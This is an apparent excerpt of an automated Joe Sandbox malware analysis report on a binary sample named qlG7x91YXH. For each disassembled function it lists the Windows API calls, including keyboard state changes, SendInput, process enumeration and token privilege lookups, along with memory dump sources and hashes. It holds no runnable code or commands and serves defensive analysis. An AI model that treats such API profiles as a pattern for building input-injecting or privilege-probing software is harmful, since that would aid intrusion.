                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 9f639561828615333cd1c4bf284bbfdb865e49a0f413c4ccd4678f647d168766
                                              • Instruction ID: 82a7010ea35f44a51ca74c5a55d912509631d6e23eaf7438e6fafd5bf8108107
                                              • Opcode Fuzzy Hash: 9f639561828615333cd1c4bf284bbfdb865e49a0f413c4ccd4678f647d168766
                                              • Instruction Fuzzy Hash: 5A811B71A00109EFCB04DF94C984EEEBBB9FF89315F244599E506AB250DB71AE46CF60
                                              Function 00DB1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction ID: 9c95df781ba9c60e93f20fa1d46b7b43211ce338b526dc8558ffae89722aaa8b
                                              • Opcode Fuzzy Hash: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction Fuzzy Hash: 8B417D39A00210EBDF217BFD9C56BFE3AE4EF46770F684225F41AD3192EA7489415272
                                              Function 00E06278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(00FD0A50,?), ref: 00E062E2
                                              • ScreenToClient.USER32(?,?), ref: 00E06315
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E06382
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction ID: afdb694d677cc4b45e2912760ea19469a3d7b1619b32620a158e0ba9c54fcf4d
                                              • Opcode Fuzzy Hash: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction Fuzzy Hash: 20514D74900209EFDF20DF68D880AAE7BB5FB95364F109259F915AB2E0D734ED91CB90
                                              Function 00DAB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction ID: 604279da94cdc24037814d3e1532c8dc94ed50b3482241176a6e39e5633b037e
                                              • Opcode Fuzzy Hash: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction Fuzzy Hash: 1D41E875A00704AFD7249F78CC41BAABBE9EB89724F10452FF551DB282D7B1E94287B0
                                              Function 00DE56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DE5783
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DE57A9
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DE57CE
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DE57FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: e3008bc26a7a0312fab0b5c74513b1a1f43b5ce99cb443ead711160ffe990a47
                                              • Instruction ID: 6b03a303237c8614bd819d6899a827bbd0bff393d444084919636c134197fe44
                                              • Opcode Fuzzy Hash: e3008bc26a7a0312fab0b5c74513b1a1f43b5ce99cb443ead711160ffe990a47
                                              • Instruction Fuzzy Hash: 58411E35600610DFCB11EF15C584A5DBBE2EF89724B19C889E84A6B362DB35FD41CBB1
                                              Function 00DAD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D96D71,00000000,00000000,00D982D9,?,00D982D9,?,00000001,00D96D71,8BE85006,00000001,00D982D9,00D982D9), ref: 00DAD910
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DAD999
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DAD9AB
                                              • __freea.LIBCMT ref: 00DAD9B4
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction ID: b1cee58c1fe44fdccd73f5c0109cc6b71ceb0bad1d95f48be6f5dbfb1b1cf3c4
                                              • Opcode Fuzzy Hash: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction Fuzzy Hash: 4431AE72A0020AAFDF249F65DC45EAF7BA6EB42710B194268FC05E6150EB35CD54CBB0
                                              Function 00E052C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E05352
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E05375
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E05382
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E053A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$InvalidateMessageRectSend
                                              • String ID:
                                              • API String ID: 3340791633-0
                                              • Opcode ID: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction ID: 2857d02ed7418d70978a05e510de2e19db2837fbc5264b14f4d1ca60b1871a95
                                              • Opcode Fuzzy Hash: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction Fuzzy Hash: E7310036A55A08EFEF309F14CC06BEA7765EB05394F586501FA00B62E4C7B9A9C0DF52
                                              Function 00DDAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DDABF1
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DDAC0D
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DDAC74
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DDACC6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction ID: 98f380a15be8d80cb1bb11538910456af382025aaa92b99223f4debc1aeb2c71
                                              • Opcode Fuzzy Hash: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction Fuzzy Hash: 29310634A60618AFEF35CB6D8C047FA7BA5AB89330F18831BE485923D1C375C9858772
                                              Function 00E07674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00E0769A
                                              • GetWindowRect.USER32(?,?), ref: 00E07710
                                              • PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • MessageBeep.USER32(00000000), ref: 00E0778C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction ID: c82ef3c531f0d96d03755cc165ee62deb9432f2cd1ec520ce0564e6eab7d9832
                                              • Opcode Fuzzy Hash: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction Fuzzy Hash: 5A41BF38A05214DFCB01CF59C894EA977F0FB49345F1851AAE994AB2A0C331F9C6CF90
                                              Function 00E016DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00E016EB
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • GetCaretPos.USER32(?), ref: 00E016FF
                                              • ClientToScreen.USER32(00000000,?), ref: 00E0174C
                                              • GetForegroundWindow.USER32 ref: 00E01752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: 8c3ddb2937ea18fa0a37defeadaf4e36bfe0d99f94ed56fe9877994013d12acf
                                              • Instruction ID: 5434a61025a2c9d93b2f60daf232cf3b02c906a72c6a0da0a754443e4da2d836
                                              • Opcode Fuzzy Hash: 8c3ddb2937ea18fa0a37defeadaf4e36bfe0d99f94ed56fe9877994013d12acf
                                              • Instruction Fuzzy Hash: 20313075D01149AFC704EFAAC881CAEBBF9EF89304B5480AAE415E7251E731DE45CBB1
                                              Function 00DDD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DDD52F
                                              • CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: 519f757fdf41b2da305ff99bf8d37a4ef6be782b3cd9e2d6e5cd6d2bf460acac
                                              • Instruction ID: 32cc3e0f03a19f802569ba3508772d7002dbf5dc8a35e69d85c0b473ba15200d
                                              • Opcode Fuzzy Hash: 519f757fdf41b2da305ff99bf8d37a4ef6be782b3cd9e2d6e5cd6d2bf460acac
                                              • Instruction Fuzzy Hash: 033190720082009FD701EF54D881AAFBBF8EF99354F14452DF585962A1EB719949CBB2
                                              Function 00DDD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,00E0CB68), ref: 00DDD2FB
                                              • GetLastError.KERNEL32 ref: 00DDD30A
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD319
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E0CB68), ref: 00DDD376
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 2c7e1978c3841f8c15b79c24be8cbd3cce2a9d8e36db89c1489f4746185a12c9
                                              • Instruction ID: 590bc500b01bd1a98900f1d251fd6cf52c35ef30af54fc43658b83da3c4c281d
                                              • Opcode Fuzzy Hash: 2c7e1978c3841f8c15b79c24be8cbd3cce2a9d8e36db89c1489f4746185a12c9
                                              • Instruction Fuzzy Hash: 4F216D705093019FCB10DF68C88186ABBE4EF56764F244A1EF499D73A1E731D94ACBA3
                                              Function 00DD1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                                • Part of subcall function 00DD1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                                • Part of subcall function 00DD1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                                • Part of subcall function 00DD1014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DD104C
                                                • Part of subcall function 00DD1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD15BE
                                              • _memcmp.LIBVCRUNTIME ref: 00DD15E1
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD1617
                                              • HeapFree.KERNEL32(00000000), ref: 00DD161E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 2182266621-0
                                              • Opcode ID: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction ID: 0d5c9f02d1e9e61fa7dcc65813032d9e168df4f7b7c313b87bfc07fecc440812
                                              • Opcode Fuzzy Hash: 4aea4ebbc8f2a1693e3e45e8c8a61b91a05a4d4b5ce88dfd28996b2f27666d47
                                              • Instruction Fuzzy Hash: C8218975E00109FFDF00DFA4C949BEEB7B8EF44344F18455AE441AB241E735AA89CBA0
                                              Function 00E02782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E0280A
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02824
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02832
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E02840
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 913a2d21001ec8b1501ef7e7176fcdeaf7239eb101ef8a316b65232192ce2403
                                              • Instruction ID: 9e32a209dec17ea97ca8e515523cc9ba5d54c402ed122dc355a72fb8799d70b7
                                              • Opcode Fuzzy Hash: 913a2d21001ec8b1501ef7e7176fcdeaf7239eb101ef8a316b65232192ce2403
                                              • Instruction Fuzzy Hash: CC21B235604111AFD7149B24CC48FAA77A5EF45328F24825DF5169B6D2CB71EC82C7A0
                                              Function 00DD78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8D8C
                                                • Part of subcall function 00DD8D7D: lstrcpyW.KERNEL32(00000000,?,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD8DB2
                                                • Part of subcall function 00DD8D7D: lstrcmpiW.KERNEL32(00000000,?,00DD790A,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?), ref: 00DD8DE3
                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DD8754,00000000,?,0000001C,?,?,00000000), ref: 00DD7923
